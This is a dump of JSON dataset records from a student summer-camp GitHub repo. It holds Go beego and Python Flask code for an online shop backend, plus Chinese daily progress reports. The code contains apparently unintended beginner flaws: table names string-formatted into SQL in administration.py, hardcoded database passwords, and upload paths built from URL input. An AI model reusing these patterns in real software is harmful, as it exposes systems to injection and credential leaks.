\"打开文件出错\", \"\"}\n\terrWriteFile = &ControllerError{500, 10010, \"服务器错误\", \"写文件出错\", \"\"}\n\terrSystem = &ControllerError{500, 10011, \"服务器错误\", \"操作系统错误\", \"\"}\n\terrExpired = &ControllerError{400, 10012, \"登录已过期\", \"验证token过期\", \"\"}\n\terrPermission = &ControllerError{400, 10013, \"没有权限\", \"没有操作权限\", \"\"}\n\n\terrNoGoods = &ControllerError{400, 20001, \"商品信息不存在\", \"数据库记录不存在\", \"\"}\n\terrDatabase2 = &ControllerError{500, 20002, \"服务器错误\", \"数据库操作错误\", \"\"}\n)\n//Predefined Statuscode values.\nvar (\n\tsucregist = &StatusCode{200,2001,\"注册成功\",\"\",\"\"}\n\tsucgoodsinfo =&StatusCode{200,2002,\"查询成功\",\"\",\"\"}\n\tsucgosearch =&StatusCode{200,2003,\"\",\"\",\"\"}\n\tsuc2 =&StatusCode{200,2004,\"\",\"\",\"\"}\n\tsuc3 =&StatusCode{200,2005,\"\",\"\",\"\"}\n\tsuc4 =&StatusCode{200,2006,\"\",\"\",\"\"}\n\tsuc5 =&StatusCode{200,2007,\"\",\"\",\"\"}\n)\n\n\ntype MainController struct {\n\tbeego.Controller\n}\n\nfunc (c *MainController) Get() {\n\tc.Data[\"Website\"] = \"beego.me\"\n\tc.Data[\"Tel\"] = \"[email protected]\"\n\tc.TplName = \"index.tpl\"\n}\n//return error info\nfunc (this *MainController) RetError(e *ControllerError){\n\tthis.Data[\"json\"] = e\n\tthis.ServeJSON()\n\n}\n" }, { "alpha_fraction": 0.6557376980781555, "alphanum_fraction": 0.6618852615356445, "avg_line_length": 23.399999618530273, "blob_id": "fba59c52ccf035a113fdbaf38b6b22674339c537", "content_id": "e30e5a4071e4e5f547b449fc91ce67ca5b92f162", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 488, "license_type": "no_license", "max_line_length": 48, "num_lines": 20, "path": "/Old-Li883/mall/views/guys_views.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom views import app\nfrom model.guys import login, logout\nfrom util.response import response\n\n\[email protected]('/api/login', methods=['post'])\ndef log_in():\n if request.cookies.get(\"id\"):\n return response(403, \"you id had login\")\n data = request.get_json()\n id = data['id']\n password = data['password']\n status = request.args.get('status')\n return login(id, password, status)\n\n\[email protected]('/api/logout')\ndef log_out():\n return logout()\n" }, { "alpha_fraction": 0.6938775777816772, "alphanum_fraction": 0.7551020383834839, "avg_line_length": 9, "blob_id": "d425cb8ccde795e44168569b18c45e1e7befbb0a", "content_id": "f58493991b2d2b8a8118fdc917b49c2b474c6e6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/Shixiaoyanger/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11日报\n搞了一天api\n稍微有点头绪了\n乱成一团\n应该明天就可以做出大致框架了" }, { "alpha_fraction": 0.729411780834198, "alphanum_fraction": 0.7470588088035583, "avg_line_length": 7.8947367668151855, "blob_id": "25dfcec1da99ef8d2d75ec3a4ef292a3d87f051b", "content_id": "f2e4dfc0a79af99bbc48857e653c57134c5a04f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 408, "license_type": "no_license", "max_line_length": 40, "num_lines": 19, "path": "/Shixiaoyanger/日报/7.19.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.19日报\n\nemmmm\n\n先做个自我检讨\n\n这几天效率有些低,我要加快脚步了\n\n#####上午和中午\n\n学院组织有个任务,排版了一下一个练手杂志任务\n\n#####下午晚上\n\n开始写商城项目\n\n写完了部分路由,以及部分数据库操作,简单的增删查改,写完了登录和注册以及查询接口\n\n期间又看了一下beego中高级的数据库操作\n\n" }, { "alpha_fraction": 0.6740442514419556, "alphanum_fraction": 0.682092547416687, "avg_line_length": 10.581395149230957, "blob_id": "44b1dc47ba08f44b96ec71fa0e7ce90235cf0822", "content_id": "7b30c0873229e666c5a829f762532023e32246cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 933, "license_type": "no_license", "max_line_length": 65, "num_lines": 43, "path": "/Old-Li883/README.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "### 操作说明:\n\n- 首先 fork [此仓库](https://github.com/tofar/bingyan-summer-camp2018)\n\n- 在你的仓库操作的时候请不要对他人目录进行任何操作\n\n- 你的操作权限仅限于你的目录,目录名字为你的 githubID,若仓库中没有你的目录请自行创建\n\n- 提交 PR 的时候自行查看是否存在代码冲突,如果存在自行解决之后再提交 PR\n\n- 提交 PR 是提交到 dev 分支,不是 master 分支\n\n- 提交之后最好跟导师说一声,让导师及时检查\n\n- 目录结构推荐如下:\n\n README.md 必须注明相关开发环境,以及一些特殊说明\n\n .gitignore 忽略一些不需要的文件\n\n client\n\n 前端代码,如果不用webpack之类的打包的话,直接一个 dist 文件夹即可\n\n - dist\n\n 编译打包后的文件目录\n\n - index.html\n - css\n - js\n\n - src\n\n 源码\n\n server\n\n 服务端代码\n\n - src\n\n 源码" }, { "alpha_fraction": 0.604651153087616, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 7.599999904632568, "blob_id": "4254f742cfe154a023cc1494ddd87d6216294da5", "content_id": "9853065f07137f8a5c9f277c449ccf7aab1fbf5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/jackwener/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12日报\n\n把beego的基础文档重新看了下。\n\n实现了展现和删除.....\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.746666669845581, "avg_line_length": 8.5, "blob_id": "fdde5f27cf9a10a745cdf33a3d6cf27241f9639f", "content_id": "896ba48ad44bebabc97d3dff3740ab7bcfeb0b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 121, "license_type": "no_license", "max_line_length": 21, "num_lines": 8, "path": "/Old-Li883/日报/7.6.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.6学习内容\n\n1. 学习cookie,session机制\n2. 学习MySQL,及三范式\n\n# 7.7计划\n\n在python练习使用MySQL" }, { "alpha_fraction": 0.843137264251709, "alphanum_fraction": 0.8666666746139526, "avg_line_length": 27.22222137451172, "blob_id": "37dac7337d90f3df85712fe73454c2f66ca8bdb1", "content_id": "548882ef262ae5c88db95d0aa636289cccbdb096", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 661, "license_type": "no_license", "max_line_length": 97, "num_lines": 9, "path": "/Old-Li883/日报/7.17.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.17\n\n今天继续做商城项目,把昨天预计的难点攻克了,预计明天应该可以完成计划的商城后台功能的(但愿不出意外)\n\nbug\n\n1. 动态创建数据表:(pycharm)变量不能是字符串,因为他本身就是一个字符串,应强制转换,我把他转化成整型\n2. 数据库一定要记得commit要不然数据不会真正提交到数据库中\n3. 在图片的存储过程中,本来上网查想将图片read下来然后直接存在数据库中,不过这样感觉过于恐怖,后来在学长的帮助下用nginx配置了一个静态文件,以后只需把路径存在数据库中,告诉前端就OK了\n\n" }, { "alpha_fraction": 0.7951807379722595, "alphanum_fraction": 0.8373494148254395, "avg_line_length": 17.55555534362793, "blob_id": "f6bb50850dec1e570382a6910c9138473f052e1a", "content_id": "27f3f2a91d919d67b9c1d69625b65a11cfa43c41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 402, "license_type": "no_license", "max_line_length": 48, "num_lines": 9, "path": "/Shixiaoyanger/日报/7.20.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.20日报\n\n1.又看了json和session,以前的有些理解好像错了,没深入研究,等到写的差不多了在修改吧\n\n2.学习了beego高级查询的用法,开始写商品的查询修改添加等操作\n\n3.添加数据库测试用例,因为语法不熟悉卡了好久\n\n4.返回大量信息的函数出错了,应该是没理解好slice还有指针等的关系,明天在修改" }, { "alpha_fraction": 0.6985645890235901, "alphanum_fraction": 0.7224880456924438, "avg_line_length": 11.29411792755127, "blob_id": "0f49c0aa3f5252a1f66f76f0efba8fa98d61b16b", "content_id": "803e6b421b004ff1cd871640e3352abe934531e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 414, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/yixiaoer/日报/7.20.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.20日报\n\n## 今日计划\n* 完成基本功能的后台部分\n\n## 完成情况\n### 遇到的一些情况\n1. 中文变量\n * 可以是中文变量,但是在后续处理中可能会出现问题\n2. mangodb中数据库的id相关\n* 是根据时间机器等信息生成的一个唯一的id\n* 在进行查找匹配时,可以使用FindiD或者bson.ObjectIdHex( )\n\n### 前端相关\n\n明日继续\nto be continued😶\n" }, { "alpha_fraction": 0.6518904566764832, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 20.10091781616211, "blob_id": "b974092873e93d6ddd0224a9967c11f4c760bca5", "content_id": "b73fe0d7247fd27d7ec23dc8a7e6682200a39147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2397, "license_type": "no_license", "max_line_length": 104, "num_lines": 109, "path": "/jackwener/server/mall/controllers/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego\"\n\t\"encoding/json\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"fmt\"\n\t\"mall/encryptions\"\n\t\"mall/models\"\n)\n\ntype MainController struct {\n\tbeego.Controller\n}\n\nfunc (c *MainController) Login() {\n\tvar ob models.UserJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tname := ob.User.Name\n\tpwd := ob.User.Password\n\tpassword := encryptions.Salt(pwd)//MD5加盐加密\n\tuser := models.User{}\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"user\").Filter(\"name\", name).Filter(\"password\", password).One(&user)\n\tid := user.Id\n\tfmt.Print(err)\n\tif err == nil {\n\t\tfmt.Print(err)\n\t\tvar reJson models.UserJson\n\t\treJson.Status = 200\n\t\treJson.Message = \"登录成功\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\tc.SetSession(\"userId\", id)\n\t\tfmt.Print(\"设置了\")\n\t\treturn\n\t} else {\n\t\tvar reJson models.UserJson\n\t\treJson.Status = 401\n\t\treJson.Message = \"登录失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t}\n}\n\n// 注册\nfunc (c *MainController) Register() {\n\tvar ob models.UserJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tname := ob.User.Name\n\tpwd := ob.User.Password\n\tpassword := encryptions.Salt(pwd)\n\tnickname := ob.User.Nickname\n\to := orm.NewOrm()\n\tuser := models.User{\n\t\tId: name,\n\t\tName: name,\n\t\tPassword: password,\n\t\tNickname: nickname,\n\t\tPageViews: 0,\n\t}\n\tvar car models.Car\n\tcar.Id = name\n\tuser.Car = &car\n\to.Insert(&car)\n\t_,err := o.Insert(&user)\n\tif err == nil {\n\t\treJson := models.UserJson{}\n\t\treJson.Status = 200\n\t\treJson.Message = \"注册成功\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Print(err)\n\t\treJson := models.UserJson{}\n\t\treJson.Status = 406\n\t\treJson.Message = \"注册失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t}\n}\n\n// 返回个人信息页的一些基本信息\nfunc (c *MainController) Person() {\n\tname := c.GetString(\":user\")\n\tfmt.Printf(name)\n\tvar user models.User\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"user\").Filter(\"name\", name).One(&user)\n\tif err != nil {\n\t\tvar reJson models.UserJson\n\t\treJson.Status = 400\n\t\treJson.Message = \"用户不存在\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\to.QueryTable(\"user\").Filter(\"name\", name).Update(orm.Params{\"page_views\": orm.ColValue(orm.ColAdd, 1)})\n\tvar reJson models.UserJson\n\treJson.User =user\n\treJson.Status = 200\n\treJson.Message = \"返回成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n" }, { "alpha_fraction": 0.6406926512718201, "alphanum_fraction": 0.6458874344825745, "avg_line_length": 20.0181827545166, "blob_id": "1215a7326a38642533d684e8edf2f034f6885d40", "content_id": "e3fea406e764def1b566edf977586b2ba0f162f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1221, "license_type": "no_license", "max_line_length": 104, "num_lines": 55, "path": "/jackwener/server/mall/models/model.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport (\n\t\"github.com/astaxie/beego/orm\"\n\t_ \"github.com/go-sql-driver/mysql\"\n\t\"time\"\n)\n\ntype Good struct {\n\tId string `orm:\"pk\"`\n\tTitle string\n\tLocal string\n\tKind string\n\tIntro string\n\tPrice int\n\tCars \t[]*Car `orm:\"rel(m2m)\"`\n\tViews int\n}\n\ntype Car struct {\n\tId string `orm:\"pk\"`\n\tUser *User `orm:\"reverse(one)\"`\n\tGoods []*Good `orm:\"reverse(many)\"`\n}\n\ntype User struct{\n\tId string `orm:\"pk\"`\n\tName string\n\tPassword string\n\tNickname string\n\tPageViews int\n\tCar *Car `orm:\"rel(one)\"`\n\tInform []*Inform `orm:\"reverse(many)\"` // 设置一对多的反向关系\n}\n\ntype Record struct {\n\tId int `orm:\"pk\"`\n\tContent string\n\tDate orm.DateTimeField\n\tNumber int\n}\n\ntype Inform struct {\n\tId string `orm:\"pk\"`\n\tUser *User `orm:\"rel(fk)\"`\n\tContent string\n}\n\nfunc init(){\n\torm.RegisterDriver(\"mysql\", orm.DRMySQL)\n\torm.RegisterDataBase(\"default\", \"mysql\", \"root:jakevin@tcp(localhost:3306)/mall_goods?charset=utf8\")\n\torm.RegisterModel(new(User), new(Good),new(Car),new(Record),new(Inform)) // 注册模型,建立User类型对象,注册模型时,需要引入包\n\torm.RunSyncdb(\"default\",false,true)\n\torm.DefaultTimeLoc = time.UTC\n}" }, { "alpha_fraction": 0.6545454263687134, "alphanum_fraction": 0.7090908885002136, "avg_line_length": 7, "blob_id": "5119b7795684fd23e52f58195aaaf69cbeeebd5f", "content_id": "313928f9999191ba546ec2db4105c4d08893bdf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 129, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/Old-Li883/日报/7.19.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.19\n\n今天调试完了商城后台,感觉功能还不是很齐全......还差点零碎的功能\n\n明日计划\n\n学习前端" }, { "alpha_fraction": 0.5631517767906189, "alphanum_fraction": 0.5805330276489258, "avg_line_length": 25.984375, "blob_id": "393f0c5cf425caad9d7adfec4bdd24460bdc7780", "content_id": "98154fc7577af9445dabc4a51f137168eebc0ce9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1840, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/Old-Li883/mall/model/administration.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n管理员\n属性 id,password,email,identity\n注册,认证提交申请的\n查找所有或指定商家,客户,商品信息\n封号,(强制下架商品)\n\"\"\"\n\nfrom util.response import response\nimport pymysql\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef a_register(id, password, email):\n cursor.execute(\"select * from administrator where id=%s\", id)\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into administrator(id,password,email,identify) values(%s,%s,%s,%s)\",\n (\n id,\n password,\n email,\n 0,\n ))\n db.commit()\n return response(200)\n else:\n return response(400, \"id has been used\")\n\n\ndef identify(id, identity):\n cursor.execute(\"select identify from %s\" % identity + \" where id=%s\",\n (id, )) # 动态创建数据表必须这样创建\n identify = cursor.fetchone()\n if identify == (None):\n return response(400, \"id has not exist\")\n cursor.execute(\"update %s \" % identity + \" set identify=1 where id=%s\",\n (id, ))\n db.commit()\n return response(200)\n\n\ndef no_identity():\n data = []\n cursor.execute(\"select * from client where identify=0\")\n for i in cursor.fetchall():\n data.append(i)\n cursor.execute(\"select * from merchant where identify=0\")\n for i in cursor.fetchall():\n data.append(i)\n cursor.execute(\"select * from administrator where identify=0\")\n for i in cursor.fetchall():\n data.append(i)\n return response(200, data)\n\n\ndef prohibited(id, identity): # 封号\n cursor.execute(\"update %s\" % identity + \" set identify=0 where id=%s\",\n (id, ))\n db.commit()\n return response(200)" }, { "alpha_fraction": 0.7704917788505554, "alphanum_fraction": 0.8196721076965332, "avg_line_length": 7.857142925262451, "blob_id": "bfeee1a06e7f665c26c2e1554f15b6d8a0d4c6c5", "content_id": "1d8c6153da546725bef301b311954bbe38e603bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 131, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/Old-Li883/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12\n\npyMySQL学习,并写了一个相关练习\n\n了解相关前后端分离的知识,看了一篇博客\n\n了解restful架构" }, { "alpha_fraction": 0.6600000262260437, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 3.6363637447357178, "blob_id": "5b502bbdf94bb967bf78cb74f4c895d28d78da10", "content_id": "83fb40bff3516bd5257f88d489e92142a4ba9926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 14, "num_lines": 11, "path": "/Old-Li883/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13\n\npython login学习\n\n看例子\n\n目前还没有写代码\n\n明日计划\n\n开始写代码" }, { "alpha_fraction": 0.4251968562602997, "alphanum_fraction": 0.4803149700164795, "avg_line_length": 5.400000095367432, "blob_id": "aa69c173f1ea989e714a545a29a0b6b3df71197e", "content_id": "afb8a1bcf4e0a58a28ba6b87c0d0c004155c3a9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 17, "num_lines": 20, "path": "/Shixiaoyanger/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.10日报\n**上午**\n---\n1.Go beego 框架安装入门\n\n2.HTML入门\n\n---\n\n## **下午**\n\n1.大致浏览http\n\n2.beego学习,懵逼中\n\n\n---\n## **晚上**\n\n划水,摸鱼。。。混了一晚上" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6969696879386902, "avg_line_length": 5.800000190734863, "blob_id": "0547951706af0ab0ee2ff629437f148aceec6e46", "content_id": "7364239d7166ed7715eabd0bdde1c65894f7f2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/jackwener/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9日报\n\n## 一天\n\n把练手任务的登录注册部分写了个大概" }, { "alpha_fraction": 0.7136752009391785, "alphanum_fraction": 0.7264957427978516, "avg_line_length": 12.764705657958984, "blob_id": "26dfeaffaf4f63dce0769ff6270199abb80ba533", "content_id": "edfd87af1f70e5c25f54fe2adc225af6cd6443bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 544, "license_type": "no_license", "max_line_length": 48, "num_lines": 17, "path": "/yixiaoer/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13日报\n\n## 今日计划\n实现注册与登陆\n\n## 完成情况(继续,没有完成...)\n\n* 接口(后台进行操作,就像是接口内的操作,提供给前端一个接入点,前端从这个点接入,就像是接口)\n* 路由(“/login”这样的东西,类似接入的一个点)\n* 在登陆成功(id&pw与数据库内容匹配)后set cookie\n* 运用框架叭\n* 先实现后台功能(后台传输数据给前端,对于这个数据进行操作,再将信息传输给前端)\n\n\n\n明日继续\nto be continued\n" }, { "alpha_fraction": 0.8423645496368408, "alphanum_fraction": 0.871921181678772, "avg_line_length": 39.400001525878906, "blob_id": "21144e72637b74140266b1aeb3d3f07e3639f4fa", "content_id": "8371d2c9be0906dad29deb8a501132d512cb8a85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 513, "license_type": "no_license", "max_line_length": 97, "num_lines": 5, "path": "/Old-Li883/mall/note/7.17bug记录.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.17bug记录\n\n1. 动态创建数据表:(pycharm)变量不能是字符串,因为他本身就是一个字符串,应强制转换,我把他转化成整型\n2. 数据库一定要记得commit要不然数据不会真正提交到数据库中\n3. 在图片的存储过程中,本来上网查想将图片read下来然后直接存在数据库中,不过这样感觉过于恐怖,后来在学长的帮助下用nginx配置了一个静态文件,以后只需把路径存在数据库中,告诉前端就OK了\n\n" }, { "alpha_fraction": 0.6475780606269836, "alphanum_fraction": 0.659633994102478, "avg_line_length": 21.123809814453125, "blob_id": "ff3d17429fab1618cfb28df2a1380522f97de058", "content_id": "7f98e81238d580785a5218fc334d661bf0ffe4bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 4805, "license_type": "no_license", "max_line_length": 107, "num_lines": 210, "path": "/jackwener/server/mall/controllers/goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"mall/models\"\n\t\"encoding/json\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"log\"\n\t\"fmt\"\n\t\"os\"\n)\n\n// 种类查询\nfunc (c *MainController) KindSearch() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tkind := ob.Good[0].Kind\n\to := orm.NewOrm()\n\tvar goods []models.Good\n\tnum, err := o.QueryTable(\"good\").Filter(\"kind\", kind).All(&goods)\n\tvar reJson models.GoodJson\n\tif err != nil{\n\t\treJson.Status = 404\n\t\treJson.Message = \"查询失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if num == 0 {\n\t\treJson.Status = 204\n\t\treJson.Message = \"分类为空\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\tvar record models.Record\n\terr1 := o.QueryTable(\"record\").Filter(\"content\",kind).One(&record)\n\tif err1 == nil {\n\t\to.QueryTable(\"record\").Filter(\"content\", kind).Update(orm.Params{\"number\": orm.ColValue(orm.ColAdd, 1)})\n\t} else {\n\t\trecord.Content = kind\n\t\trecord.Number = 1\n\t\to.Insert(&record)\n\t}\n\treJson.Good = goods\n\treJson.Status = 200\n\treJson.Message = \"查询成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n}\n\n// 地域查询\nfunc (c *MainController) LocalSearch() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tlocal := ob.Good[0].Local\n\to := orm.NewOrm()\n\tvar goods []models.Good\n\tnum, err := o.QueryTable(\"good\").Filter(\"local\", local).All(&goods)\n\tvar reJson models.GoodJson\n\tif err != nil{\n\t\treJson.Status = 404\n\t\treJson.Message = \"查询失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if num == 0 {\n\t\treJson.Status = 204\n\t\treJson.Message = \"分类为空\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\tvar record models.Record\n\terr1 := o.QueryTable(\"record\").Filter(\"content\",local).One(&record)\n\tif err1 == nil {\n\t\to.QueryTable(\"record\").Filter(\"content\", local).Update(orm.Params{\"number\": orm.ColValue(orm.ColAdd, 1)})\n\t} else {\n\t\trecord.Content = local\n\t\trecord.Number = 1\n\t\to.Insert(&record)\n\t}\n\treJson.Good = goods\n\treJson.Status = 200\n\treJson.Message = \"查询成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n}\n\n// 商品信息页\nfunc (c *MainController) Goods() {\n\ttitle := c.GetString(\":good\")\n\tfmt.Print(title)\n\tvar good models.Good\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"good\").Filter(\"title\", title).One(&good)\n\tfmt.Print(good)\n\tif err != nil {\n\t\tvar reJson models.GoodJson\n\t\treJson.Message = \"商品不存在\"\n\t\treJson.Status = 404\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\tlocal := good.Local\n\t//fmt.Printf(local)\n\tintro := good.Intro\n\tprice := good.Price\n\turl := \"static/img/\" + title +\"/\"\n\tvar reJson = models.GoodJson{}\n\tvar good1 models.Good\n\tgood1.Local = local\n\tgood1.Price = price\n\tgood1.Intro = intro\n\treJson.Good = append(reJson.Good,good1)\n\treJson.Url = url\n\treJson.Status = 200\n\treJson.Message = \"返回成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n// 上传图片\nfunc (c *MainController) Picture() {\n\tname := c.GetString(\":good\")\n\tf, h, err := c.GetFile(\"name\")\n\tif err != nil {\n\t\tlog.Fatal(\"getfile err \", err)\n\t}\n\tdefer f.Close()\n\tpath := \"static/img/\"+name\n\t_, err1 := os.Stat(path)\n\tif err1 != nil {\n\t\terr2 := os.Mkdir(path, os.ModePerm)\n\t\tif err2 != nil{\n\t\t\tfmt.Print(err2)\n\t\t}\n\t}\n\tc.SaveToFile(\"name\", \"static/img/\"+name+\"/\"+ h.Filename) // 保存位置在 static/static/img/name/, 没有文件夹要先创建\n}\n\n\n\n// 最新查询\nfunc (c *MainController) RecentSearch() {\n\tvar reJson models.SearchJson\n\tvar records []models.Record\n\to := orm.NewOrm()\n\t_, err := o.QueryTable(\"record\").OrderBy(\"-date\").All(&records)\n\tif err != nil{\n\t\to.QueryTable(\"record\").All(&records)\n\t}\n\tfmt.Print(records)\n\tfor i, _ := range records{\n\t\treJson.Content = append(reJson.Content,records[i].Content)\n\t}\n\treJson.Message = \"查询成功\"\n\treJson.Status = 200\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n// 热门查询\nfunc (c *MainController) PopularSearch() {\n\tvar reJson models.SearchJson\n\tvar records []models.Record\n\to := orm.NewOrm()\n\t_, err := o.QueryTable(\"record\").OrderBy(\"-number\").All(&records)\n\tif err != nil{\n\t\to.QueryTable(\"record\").All(&records)\n\t}\n\tfmt.Print(records)\n\tfor i, _ := range records{\n\t\treJson.Content = append(reJson.Content,records[i].Content)\n\t}\n\treJson.Message = \"查询成功\"\n\treJson.Status = 200\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n\n/*\nfunc (c *MainController) Car() {\n\tvar ob models.ReJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tuserId := ob.Users[0].Id\n\to := orm.NewOrm()\n\tvar goods[] class.Goods\n\tvar carId int\n\to.QueryTable(\"user\").Filter(\"id\", userId).RelatedSel().One(&carId,\"carId\")\n\to.QueryTable(\"good\").Filter(\"car_id\",carId).All(&goods)\n\tvar reJson models.ReJson\n\treJson.Goods = goods\n\treJson.Status = 200\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n}\n\nfunc (c *MainController) PopularSearch() {\n\n}\n\nfunc (c *MainController) PopularSearch() {\n\n}\n*/" }, { "alpha_fraction": 0.8101266026496887, "alphanum_fraction": 0.8101266026496887, "avg_line_length": 21.714284896850586, "blob_id": "136ca5fa3f120f84bc6dd05e821d34317b0424f5", "content_id": "823f0b8669d92349986198df5538943815c37cb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 33, "num_lines": 7, "path": "/Old-Li883/mall/views/__init__.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import Flask\n\napp = Flask(__name__)\nimport views.client_views\nimport views.guys_views\nimport views.merchant_views\nimport views.administration_views" }, { "alpha_fraction": 0.5853658318519592, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 7.199999809265137, "blob_id": "aee6fa620c1e68075faf63031d5065c15f55cd88", "content_id": "35ffa5c201b5e70465b580dc9d5079fda5b78f7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/jackwener/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": 